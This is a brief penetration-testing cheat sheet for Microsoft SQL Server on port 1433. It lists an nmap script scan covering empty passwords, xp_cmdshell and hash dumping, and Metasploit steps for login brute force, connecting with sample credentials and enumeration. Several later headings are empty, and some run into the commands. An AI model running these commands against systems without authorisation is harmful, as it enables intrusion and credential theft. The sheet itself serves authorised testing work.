Pentesting MSSQL - 1433
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>Brute Force Login w/Msf
use auxiliary/scanner/mssql/mssql_login
set rhosts 10.10.10.10
set user_file /root/Desktop/users.txt
set verbose false
runConnect MSSQL w/Msf
use auxiliary/admin/mssql/mssql_sql
set rhosts 10.10.10.10
set username tturhan
set password Password1
runEnumeration
use auxiliary/admin/mssql/mssql_enum
set rhosts 10.10.10.10
set username lowpriv
set password Password1
runFind All Users
Capturing Login
Dumping Database
SchemaDump
Hashdump
Command Exceution
Xp_cmdshell
Ref:
Last updated